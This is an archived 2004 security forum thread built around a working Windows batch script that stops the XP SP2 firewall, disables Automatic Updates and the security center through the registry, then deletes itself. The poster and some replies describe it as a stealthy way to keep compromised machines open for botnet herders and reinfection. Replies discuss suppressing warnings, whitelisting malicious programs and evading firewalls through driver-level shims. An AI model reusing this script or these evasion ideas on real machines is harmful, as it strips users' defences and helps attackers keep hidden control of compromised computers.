Help - Search - Member List - Calendar
GovernmentSecurity.org > The Archives > General Network Security
Pages: 1, 2
Yorn
Apr 12 2004, 09:57 PM
Last Update: 5-10-2004
I can assure you the first virus to be released following SP2's inception will contain something similar to the following:

KillFirewall.bat
CODE

@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0


Shuts down Windows Firewall, disables Automatic Updates for the next reboot.

And no, Microsoft is not going to fix this. This code will work when it goes live. WTG MS!

4-24-2004
EDIT: Added "DEL %0" at the request of illwill to delete the batch file itself.

5-7-2004
EDIT: Changed to "net stop SharedAccess" as indicated by int23h

5-10-2004
EDIT: Okay. Microsoft added another service after my first post and I didn't even notice it. Looks like it is time to disable that too. Modified the code to reflect that.
cougar
Apr 12 2004, 10:03 PM
nice smile.gif. will try this.
daguilar01
Apr 13 2004, 12:24 AM
thx for sharing that info Yorn, good to know, smile.gif
Alexander01
Apr 13 2004, 01:08 AM
Windows Firewall/Internet Connection Sharing (ICS)

im sure this is not the servicename but the displayname
i think it's "SharedAccess"
misa
Apr 13 2004, 01:25 AM
yeah this will for sure be included in the next big virus
JMP
Apr 13 2004, 04:18 PM
CODE
@echo off
net stop "Windows Firewall/Internet Connection Sharing (ICS)"
> "%Temp%.\kill.reg" ECHO REGEDIT4
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"


Im not quite sure i know what this bat file does. The way i understand it, is, that it first creates the file kill.reg. This file contains the registry strings, and edits the values, both for the firewall, and the autoupdate feature. Then it runs the kill.reg file, and then deletes it. Is this correct, or have i misunderstood something?

If this is how it works, its a really simple way to take out the firewall. A way Microsoft could prevent this from happening, is to not make it possible to dissable it so easily, just by editing a string in the registry.
spade852
Apr 14 2004, 01:21 PM
but everything concerning startup is configured in the registery. That's the way windows was built. There is no getting around that.
t0kra
Apr 14 2004, 01:25 PM
Very nice smile.gif
Windows services are so easy to change.
Getting the inital access is always gonna be the hard step but hey once ure in there anything is possible smile.gif

TY

t0kraaaaaaa
JMP
Apr 14 2004, 02:14 PM
QUOTE (spade852 @ Apr 14 2004, 01:21 PM)
but everything concerning startup is configured in the registery. That's the way windows was built. There is no getting around that.

Oh okay. Well there isn't much Microsoft can do about this then blink.gif pitty its so easy to shut it down.
Spawn
Apr 14 2004, 05:48 PM
This looks interesting smile.gif I'm gonna test it....
tweakz20
Apr 14 2004, 10:42 PM
KNEW IT!!!!!!!!!!!! the next big screw up... ahahaha.. those losers.. so simple too

what gets me.... how did you find this out before ms even released it?...
Cyrus
Apr 15 2004, 04:33 AM
i think he tested it with windows xp sp2 rc1. Its still beta status.....
JMP
Apr 15 2004, 12:52 PM
QUOTE (tweakz20 @ Apr 14 2004, 10:42 PM)
KNEW IT!!!!!!!!!!!! the next big screw up... ahahaha.. those losers.. so simple too

what gets me.... how did you find this out before ms even released it?...

Yes, a beta version has been released. Although we are talking Windows here, it looks like its going to be a pretty good update, and a big one, 273 MB actually. A much better firewall (try forgetting how easy it is to dissable), popup blocking in IE (yes, some people still use this lousy browser), and much more.
ind0r
Apr 15 2004, 02:17 PM
next tool which I will try in my hack test computer. thx :-)
bertimen
Apr 15 2004, 02:26 PM
Nice it works !

Special thx to you biggrin.gif
Baracuda
Apr 15 2004, 04:07 PM
why would you want to dissable autoupdate???!?
kingvandal
Apr 15 2004, 04:38 PM
... Registry keys .... kinda off topic..

http://hr.uoregon.edu/davidrl/windowsxp.html


This guy has good idea:
_______________________

Setting Meaning
dword:00000002 Automatic
dword:00000003 Manual
dword:00000004 Disabled


REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Alerter]
"Description"="Allows alert messages to be sent to W2K servers."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ALG]
"Description"="Allows you to use the built-in firewall."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AppMgmt]
"Description"="Allows programs to use the add/remove control panel"
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS]
"Description"="Allows you to resume file transfers on slow connections."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Browser]
"Description"="Used to show a list of computers on a local network."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ClipSrv]
"Description"="Permits you to cut and paste text and graphics over the network."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\COMSysApp]
"Description"="Allows COM-aware software components to communicate with each other."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CryptSvc]
"Description"="Allows for authentication, encoding and encryption to verify software signatures."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ERSvc]
"Description"="Allows applications to send error reports to Microsoft if/when they crash."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventSystem]
"Description"="A method for allowing software compenents to communicate with each other."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FastUserSwitchingCompatibility]
"Description"="Allows for multiple users on a single machine without requiring you to log out."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\helpsvc]
"Description"="Allows the XP Built-in Help and Support Center to run."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ICFS]
"Description"="Enables the built-in Microsoft firewall."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanworkstation]
"Description"="The Workstation service enables a computer to connect to and use network resources."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LmHosts]
"Description"="Enables NetBIOS over TCP/IP (NetBT) services."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Messenger]
"Description"="Despite its best efforts, it's an evil service that has massive security flaws."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mnmsrvc]
"Description"="Allows NetMeeting programs to access the local computer."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSDTC]
"Description"="Provides data replication between a client and multiple Windows servers."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MSIServer]
"Description"="Allows for programs to be installed. Enough said."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Nla]
"Description"="Useful if you have a multihomed or multiple-network connected computer."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PolicyAgent]
"Description"="Provides IPSEC capabilities (secure TCP/IP)."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProtectedStorage]
"Description"="Allows the local computer to save passwords."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RDSessMgr]
"Description"="Allows remote access and control of the local computer."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry]
"Description"="Allows remote access and control of the Windows registry."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RSVP]
"Description"="See MS-Technet Q316666 for vague details."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RPCLocator]
"Description"="Allows distributed applications to use the Microsoft RPC name service."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\seclogon]
"Description"="Enables starting processes under alternate credentials."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS]
"Description"="Allows the computer to be aware of network connectivty interruptions."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler]
"Description"="Loads files to memory for faster printing."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srservice]
"Description"="System Restore BloatWare ™. Just say no."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule]
"Description"="Start programs at specified times."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSDPSRV]
"Description"="An often unused discovery protocol that has yet to catch on."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Description"="Used mainly to allow for fast user switching."
"Start"=dword:00000004

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Themes]
"Description"="Applies visual styles to the user interface via ComCtl32.dll."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TrkWks]
"Description"="Updates the location of links that are moved on NTFS volumes."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\upnphost]
"Description"="Essentially a networkable version of Plug and Play that never really caught on."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UPS]
"Description"="Uninterruptible Power Supply service Manager."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time]
"Description"="Allows the local computer to synchronize its clock with an Internet Time Server"
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WebClient]
"Description"="Enables Windows-based programs to create, access, and modify non-local files across the Internet."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\winmgmt]
"Description"="Similiar to Simple Network Management Protocol (SNMP) and Desktop Management Interface (DMI)."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSp]
"Description"="Allows your portable music player to be tracked by serial number."
"Start"=dword:00000003

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wmi]
"Description"="Essentially an XML encoder for representing network services."
"Start"=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
"Description"="Allows you to use the WindowsUpdate website."
"Start"=dword:00000002


I thought it was good reference for me, maybe it will help someone out.

Rich.
PiP
Apr 15 2004, 06:01 PM
QUOTE (tweakz20 @ Apr 14 2004, 10:42 PM)
KNEW IT!!!!!!!!!!!! the next big screw up... ahahaha.. those losers.. so simple too

what gets me.... how did you find this out before ms even released it?...

its not really a ms screw up man..

its just using windows functions to disable the firewall and auto update, since services are 'controled' in the registary as to if they should start or not, and using 'net stop' is a pretty standard command for stoping services from the command line...
Yorn
Apr 15 2004, 09:17 PM
QUOTE (Baracuda @ Apr 15 2004, 10:07 AM)
why would you want to dissable autoupdate???!?

There are a lot of reasons why a blackhat would want to. For SP2, the most important reason would be that a good reason to do it would be because it is the DEFAULT option to download and install all patches.

The more exploitable the machine, the better the chance that the the machine can be exploitable in the future.

Ironically, the guys that run STROs do a much better job updating Windows for security vulnerabilities than I do. By disabling autoupdate, they can manage which updates get installed and prevent windows updates from clogging up their uploads/downloads.

It's a common blackhat kind of thing. I included it in the code so admins like myself can watch out for it. Of course, if we are doing things right we'll just enforce policies and this won't even matter.
Yorn
Apr 15 2004, 09:23 PM
QUOTE
but everything concerning startup is configured in the registery. That's the way windows was built. There is no getting around that.


For something as important as a firewall, I think it should be more "kernel-level". As an administrator, I don't want to know that some goon can run some script and just disable my firewall. That's ridiculous, IMHO. But you *are* right. I'm just saying that it should change.

QUOTE
Im not quite sure i know what this bat file does. The way i understand it, is, that it first creates the file kill.reg. This file contains the registry strings, and edits the values, both for the firewall, and the autoupdate feature. Then it runs the kill.reg file, and then deletes it. Is this correct, or have i misunderstood something?


Accurate except for one thing. The absolute very first thing it does is disable the firewall. Then it creates a registry file that contains settings that keep it disabled and will prevent autoupdate from running on next reboot. It doesn't kill auto-update services because they may be running and it'd be odd if they suddenly died to the user.

This is somewhat of a stealthy way to disable the firewall. The user won't notice a thing.
Major Chrome
Apr 15 2004, 09:33 PM
I can't believe Microsoft would do something so stupid.

On second thought, maybe I can wink.gif

Seems like it could be interesting to see what happens with this, if someone gains access to a computer somehow, then disables this. The possibilites are endless.
tweakz20
Apr 15 2004, 10:06 PM
QUOTE (PiP @ Apr 15 2004, 06:01 PM)
QUOTE (tweakz20 @ Apr 14 2004, 10:42 PM)
KNEW IT!!!!!!!!!!!! the next big screw up... ahahaha.. those losers.. so simple too

what gets me.... how did you find this out before ms even released it?...

its not really a ms screw up man..

its just using windows functions to disable the firewall and auto update, since services are 'controled' in the registary as to if they should start or not, and using 'net stop' is a pretty standard command for stoping services from the command line...

i know that, but the point is that net stop shouldn't be able to stop it, they should incorporate some way to NOT stop the service and have it running IN the OS and not OVER as a seperate program, try stopping a system file
ex:
system
winlogon.exe
services.exe
svchost.exe
whatever, you get the point
PiP
Apr 16 2004, 02:55 AM
QUOTE (tweakz20 @ Apr 15 2004, 10:06 PM)
i know that, but the point is that net stop shouldn't be able to stop it, they should incorporate some way to NOT stop the service and have it running IN the OS and not OVER as a seperate program, try stopping a system file
ex:
system
winlogon.exe
services.exe
svchost.exe
whatever, you get the point

why in the world would we (the users), want them to force auto update and there firewall on us, (which by defult, at least on my machine let through file and printer sharing to the netwhen i installed the SP2 release) ??!?????

I would trust ZA over it anyday
jimmy
Apr 16 2004, 04:06 AM
why don't I see this SP2 on MS yet ?
not released yet ?

anyway, the batch is easy, just stops firewall and disables it's startup
also disables startup of auto update
PiP
Apr 16 2004, 06:28 AM
Its because its a 'technical Preview'

here is the link

http://www.microsoft.com/technet/prodtechn...sp2preview.mspx
tweakz20
Apr 16 2004, 07:34 PM
pip, what did that have to do with my post? lol

yeah, i just wouldn't trust it, microsoft isn't exactly known for their security services
JMP
Apr 16 2004, 09:59 PM
QUOTE
Accurate except for one thing. The absolute very first thing it does is disable the firewall. Then it creates a registry file that contains settings that keep it disabled and will prevent autoupdate from running on next reboot. It doesn't kill auto-update services because they may be running and it'd be odd if they suddenly died to the user.

This is somewhat of a stealthy way to disable the firewall. The user won't notice a thing.


Ah, i see it smile.gif pretty nice now you look at it, and still simple.

QUOTE
know that, but the point is that net stop shouldn't be able to stop it, they should incorporate some way to NOT stop the service and have it running IN the OS and not OVER as a seperate program, try stopping a system file


Thats actually a nice idea. Integrate the firewall into an important service, just like the ones you mention. That way it can't be shut down. Maybe you should suggest this to Microsoft smile.gif
Truepower
Apr 17 2004, 04:18 AM
I've got a better idea, how about Microsoft NOT put a firewall in windows at all and have at least one thing LESS thats gonna be owned 5 minutes after its release.

That way at least users will have to install a decent firewall, and those that dont...well thats just asking for trouble.
PiP
Apr 17 2004, 06:09 AM
QUOTE (tweakz20 @ Apr 16 2004, 07:34 PM)
pip, what did that have to do with my post? lol

yeah, i just wouldn't trust it, microsoft isn't exactly known for their security services

lol..well the dude (jimmy) that posted directly before my last post asked why he couldnt see SP2 on the MS site...so i posted the link to it.....nothing to do with your initial (?) post...but ...baahh jimmy asked! maybe i should of quoted him..but i cbf at the time lol
Yorn
Apr 24 2004, 06:23 PM
Illwill made a good suggestion to me in IRC to delete the batch file itself.

I appended "DEL %0" to reflect the change.
mathofaka
Apr 26 2004, 11:57 PM
ok yorn nice to know but can u ansewr me one thing just to be sure

u send the firewall code and launch it as a batch file? huh.gif
s3mtexx
Apr 27 2004, 09:02 AM
nice work! thnx for sharing biggrin.gif
tibbar
Apr 28 2004, 08:18 PM
ive been testing sp2 and that bat isnt quite enough. the user will get constant reminders that the firewall is stopped, and will know somethings not right. if you look a bit harder, there are reg settings to stop the reminder...

better still is to add your own programs (under suitable names) to registry's allowed list for the firewall...then no need to kill it.

final thoughts...i noticed that at moment sp2 firewall doesnt block system processes...i guess this is a bug which will be fixed on release.
st3@1th
Apr 28 2004, 08:51 PM
The reason MS didn't make firewall/AU difficult/impossible to disable is they're not stupid. If someone has problem with them, doesn't want to use them they shouldn't have to. And if the user can turn them off so can a remote attacker/virus. This has nothing to do with MS, any 3rd party firewall can be disabled by a virus or hacker if they have rooted a box, and not just with windows.

The whole discussion is pointless. If they're was a way to remotely disable a firewall without any authentication then you have an actual problem.

As for the script itself, it's fine, but not much point in adding it to a virus, once the virus, or skiddie for that matter, has control of an XP machine, it wants to keep out other intruders, so disabling security features is not in its best interest, XPs firewall only blocks incoming connection attempts so it wouldn't conflict with the virus sending traffic anyway.
extreme83
Apr 28 2004, 09:18 PM
i think the service name is wrong in the batch file..

i have disabled windows firewall many times using net stop.

the command i always used was:

NET STOP "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"

correct me if i'm wrong
SlippyG
Apr 29 2004, 05:07 AM
QUOTE (tibbar @ Apr 28 2004, 08:18 PM)
ive been testing sp2 and that bat isnt quite enough.  the user will get constant reminders that the firewall is stopped, and will know somethings not right.  if you look a bit harder, there are reg settings to stop the reminder...

Good observation

QUOTE (tibbar @ Apr 28 2004, 08:18 PM)
better still is to add your own programs (under suitable names) to registry's allowed list for the firewall...then no need to kill it.

A better solution, definately. But limited to windows firewall and leaves much evidence of tampering behind. Killing firewalls has always seemed to be a bad idea to me, it stinks to high heaven that something is going on. Not a good way to assure access in the longer term particularly when there are more fundamental and effective methods.

microsoft gave us an open architecture to (ab)use as we see fit. The horror of this is that we can take advantage of the published interfaces and write our own shims for the transport/service/namespace, either in the stack (good for some things, not so much for this) or below userland where the NDIS resides along with miniport drivers and the drivers themselves.

This leaves us with the question, why bother negotiating firewalls when the open architecture allows us to sneak in underneath their own layered drivers and leave the firewall (regardless of vendor) apparently functioning normaly. Everyone is using sledgehammers to crack a very small nut indeed.


So, if you can code well, and you're still worried about netstat, firewall filtering and the occassional 'allow access to internet?' dialog then you realy need to download M$DDK and start flexing your creative muscle where it counts - either patching or shimming in and around NDIS and the miniport drivers.

IMO killing firewalls realy is just a quick n ultradirty fix when nothing else matters except unrestricted network access for the next few minutes only.


SG
st3@1th
May 5 2004, 07:30 PM
Thankyou for that intelligent post wink.gif
jedi
May 6 2004, 12:03 PM
thx m8 very useful .bat smile.gif
int23h
May 6 2004, 02:59 PM
note that
CODE
net stop SharedAccess

is the same as
CODE
NET STOP "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"

but it's OS language independent.
touk
May 6 2004, 09:23 PM
QUOTE (JMP @ Apr 16 2004, 09:59 PM)
QUOTE
QUOTE
know that, but the point is that net stop shouldn't be able to stop it, they should incorporate some way to NOT stop the service and have it running IN the OS and not OVER as a seperate program, try stopping a system file


Thats actually a nice idea. Integrate the firewall into an important service, just like the ones you mention. That way it can't be shut down. Maybe you should suggest this to Microsoft smile.gif

Yes but there's a way to kill process like system.exe or csrss.exe
Process explorer do it.

http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
Yorn
May 7 2004, 08:42 PM
QUOTE
u send the firewall code and launch it as a batch file?


THIS IS NOT AN EXPLOIT! If it was, I'd be posting it in "Exploit Research and Discussion". This is something that a malicious user can run after your computer is "compromised" via an IE exploit/script to open up all ports on your computer and then/thus infect you or later reconnect to you.

There are some blatantly obvious reasons to do this that several people are missing out on which I will explain below.

QUOTE
ive been testing sp2 and that bat isnt quite enough. the user will get constant reminders that the firewall is stopped, and will know somethings not right. if you look a bit harder, there are reg settings to stop the reminder...


I did not get this reminders in my test. Can anyone else confirm this? I think I've done enough work on this and will let other contribute registry hacks to the batch file if they want to disable reminders like the one mentioned above.

QUOTE
better still is to add your own programs (under suitable names) to registry's allowed list for the firewall...then no need to kill it.


IMHO, that only gets you so far. I think it would be far better you patch as you go on a compromised computer that you "owned" with the firewall disabled than it would be to let one program through that you might later update with another EXE and cross your fingers, cause if it doesn't work the VERY FIRST TIME you do the IE exploit (remember, firewall is enabled, your not exploiting this machines via RPC, LSASS, or other means. Your only option after SP2 is going to be IE exploits which come out maybe once every two months.

QUOTE
As for the script itself, it's fine, but not much point in adding it to a virus, once the virus, or skiddie for that matter, has control of an XP machine, it wants to keep out other intruders, so disabling security features is not in its best interest, XPs firewall only blocks incoming connection attempts so it wouldn't conflict with the virus sending traffic anyway


Simply put, if you don't disable the firewall on compromised workstations and you're a botnet herder or FXPr, you're only shooting yourself in the foot later on when new expoits come out and you can't reinfect the computers that were cleaned of your trojan the first time around.

I don't think you understand me very well, here. Worms/Trojans WILL NOT exist on XP w/SP2. At least, not at *all* to the extent that they do now. Agobot will, cause it connects out to an IRC server, but those that listen in on specified ports will keep listening for years and years and years and years.

QUOTE
The whole discussion is pointless. If they're was a way to remotely disable a firewall without any authentication then you have an actual problem.


The thing that really gets on my nerves is when someone complains about a thread for existing. I posted a batch file that is going to do exactly what one of the first exploits/email viruses for SP2 could do. You're right, it isn't an exploit, but I never claimed that it was.

QUOTE
the command i always used was:

NET STOP "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"

correct me if i'm wrong


We're both right. The command you are using is for Windows XP SP1 and perhaps Windows 2000.

QUOTE
net stop SharedAccess


Excellent point, I'm going to modify it to reflect that.

And now we get to Slippy G, drama queen of the impossible. I should go back and see if you replied to the other huge thread. (sorry you caught me on a bad day so I feel like ripping someone a new one)

QUOTE ("SlippyG")
microsoft gave us an open architecture to (ab)use as we see fit. The horror of this is that we can take advantage of the published interfaces and write our own shims for the transport/service/namespace, either in the stack (good for some things, not so much for this) or below userland where the NDIS resides along with miniport drivers and the drivers themselves.


Yup, and it's a good thing that NDIS and "Datalink Layer" protocols which you describe are passed from my computer and somehow magically skip over the router where they are stripped and then are used to trigger some response in my packet level shim running at a higher priority than kernel. Excuse me if I call BS!

QUOTE ("SlippyG")
This leaves us with the question, why bother negotiating firewalls when the open architecture allows us to sneak in underneath their own layered drivers and leave the firewall (regardless of vendor) apparently functioning normaly. Everyone is using sledgehammers to crack a very small nut indeed.


All you're talking about is a kernel hook which some of the guys at http://www.rootkit.com/ have been doing for a year now. The point is, you're talking as if we exist in a world without kernel-level driver and file access sensors that can catch EXACTLY the kind of thing you are describing. You're hyping up something that is not scary, and what is sad is that you've probably learned to do this because it works well and is not "technically" a lie.

QUOTE ("SlippyG")
So, if you can code well, and you're still worried about netstat, firewall filtering and the occassional 'allow access to internet?' dialog then you realy need to download M$DDK and start flexing your creative muscle where it counts - either patching or shimming in and around NDIS and the miniport drivers.


I imagine you as someone who *can't* code but has access to a guy that does and gives you the kind of reinforcement you need to keep spewing the garbage you do about kernel hooking and "woe be the day" and "fire and brimstone" and all the other horrors that *could* happen, but never or very rarely do.
SlippyG
May 8 2004, 12:32 AM
QUOTE (Yorn @ May 7 2004, 08:42 PM)
THIS IS NOT AN EXPLOIT!

No argument here : ) Its a quick, dirty and administratively loud way to get packets out AFTER an exploit. Its in the right forum : )


QUOTE (Yorn @ May 7 2004, 08:42 PM)
Worms/Trojans WILL NOT exist on XP w/SP2. At least, not at *all* to the extent that they do now.

I agreed with you up till here. But its hardly worth discussing.


QUOTE (Yorn @ May 7 2004, 08:42 PM)
The thing that really gets on my nerves is when someone complains about a thread for existing. I posted a batch file that is going to do exactly what one of the first exploits/email viruses for SP2 could do. You're right, it isn't an exploit, but I never claimed that it was.

Personaly I don't disagree with your post. I just think that crackers should set their sights a little higher. Otherwise they will never progress beyond hexing subseven and taking axes to firewalls. Personally I'd like to think that most wannabe's would aspire to something more. Although, I pretty much know I'm wrong on this point. The arguments against me later in your post serve to reinforce this view.

Here, I fear, begins a war...


QUOTE (Yorn @ May 7 2004, 08:42 PM)
And now we get to Slippy G, drama queen of the impossible. I should go back and see if you replied to the other huge thread. (sorry you caught me on a bad day so I feel like ripping someone a new one)

Great, my stepfather died last night and nobody told me till today. So I'm in just the mood to come right back at you. Lets get this straight, you're saying that infecting the upper interface of the network driver sys is impossible? I'd say its ALMOST as simple as IAT patching (or is that also impossible?)

Lets get absolutely lucid about whats impossible here. And then at least I'll have the opportunity to drag you back to school in front of your peers. And, quite frankly, for your closing comments you'd deserve just that : )


QUOTE (Yorn @ May 7 2004, 08:42 PM)
QUOTE ("SlippyG")
microsoft gave us an open architecture to (ab)use as we see fit. The horror of this is that we can take advantage of the published interfaces and write our own shims for the transport/service/namespace, either in the stack (good for some things, not so much for this) or below userland where the NDIS resides along with miniport drivers and the drivers themselves.

Yup, and it's a good thing that NDIS and "Datalink Layer" protocols which you describe are passed from my computer and somehow magically skip over the router where they are stripped and then are used to trigger some response in my packet level shim running at a higher priority than kernel. Excuse me if I call BS!

I don't think I mentioned reliance on layer2 protocols did I ? Nor do I recall talking topology. I did, however, mention that this shim is in OSI layer 2. This means, of course, that we are operating below the protocol stack (Indeed, below Intermediate drivers, the NDIS, protocol drivers and the entire WS2 protocol chain) but that DOESN'T mean that we are communicating in layer 2 PDU's. You seem to have jumped at a false assumption. If we were it would only work across the segment, which I believe is the crux of your point about routers.

Instead, imagine that from where we are positioned we can utilise just about any protocol without invoking the stack, creating sockets or requiring raw socket support. The point? We are below the firewall hook and all it takes is knowing how packets are crafted (A lowly CCNA could manage that) and have enough coding skill to patch entrypoints to a published interface (100,000 examples from virii that have been patching jumptables since the 80's and numerous cracking tutorials patching IAT) Do you REALY need schooling on this?

I'm NOT saying that this is some damn UBERMETHOD. What I'm saying is that if you have any bloody appreciation of the systems you're cracking - and a modicum of damn motivation - this stuff is almost a no brainer. So get DriverStudio, a copy of the DDK, and you can do this in bloody delphi if you must ferchristsakes.

Killing firewalls is about as stealthy as being hit with a brick. People have been hexing other peoples malware and bouncing around inside of systems with fireaxes for so long they've missed the damned point. What you propose isn't new, clever or even creative. It breaks no new ground and mimicks what people with no finese have been doing for decades. If its in the way just kick it down. is that hacking to you ? *sigh*

Also, a point of note...

The term 'Priority' doesn't make a great deal of sense when talking about patching the network driver to create a code shim between the NDIS and the base driver. what DOES make sense is that we're BELOW the kernel as the kernel sits on a hardware abstraction provided by drivers of the type we're shimming. If thats what you mean by 'priority' then you're at best mistaken. You do know we're threadless down here?

But again, If you'd like to stake your reputation on a clear and definite statement of what is 'impossible' about this scenario then I'd more than welcome the chance to prove you conclusively and undeniably wrong.

Don't resort to cheap assassination tactics simply to avoid my point. Just answer the damn thing. I'll reinstate them briefly so you don't miss them in your reply.

1. Killing firewalls is loud, obvious and stupid. Yes or No!
2. There are many better less noticeable methods. Yes or No!


QUOTE (Yorn @ May 7 2004, 08:42 PM)
All you're talking about is a kernel hook which some of the guys at http://www.rootkit.com/ have been doing for a year now. The point is, you're talking as if we exist in a world without kernel-level driver and file access sensors that can catch EXACTLY the kind of thing you are describing. You're hyping up something that is not scary, and what is sad is that you've probably learned to do this because it works well and is not "technically" a lie.

Oh, and of course killing the firewall is never going to be noticed? No simple ID solution monitors this? Be more careful in your choice of arguments.

However, again, you seemed to have missed the point. Kernel hooking is higher level and much easier to deal with. The kernel sits on an abstract representation of the physical machine, the 'HAL' So, that in mind please throw away your notion of the kernel being in control of everything. Realise that we're talking about code that infects the network driver itself at its weakest and most accessible point (upfacing interface) and enjoys the unique status of having NOTHING between ITSELF and the NIC. No kernel, No hooks, No filters, Nothing*.

But, I offer you the chance to point me towards any software solution that installs a sensor that will detect packets originated in the network driver .SYS itself before hitting the NIC. You know of any replacement HAL's or something for this ? I'd genuinely be interested in finding one. Not that it matters a great deal because the question we're then left with is how widely implimented it is and I think you'd have to conceed my point.

Besides which, since you're saying that my idea has no credit on this score then you must be saying that killing the firewall outright is somehow less detectable ? Forgive me if I smile.

*In some rare instances the driver itself provides filter security. As I say, this is rare and even when present is hardly ever utilised.


QUOTE (Yorn @ May 7 2004, 08:42 PM)
I imagine you as someone who *can't* code but has access to a guy that does and gives you the kind of reinforcement you need to keep spewing the garbage you do about kernel hooking and "woe be the day" and "fire and brimstone" and all the other horrors that *could* happen, but never or very rarely do.

I don't recall predicting the end of the world. I have said before that the windows kernel is woefully inadequate in terms of security and needs a complete rethink. I can point you to microsoft coders who have publicly admitted pretty much the same thing. Thats hardly 'fire and brimstone' stuff.

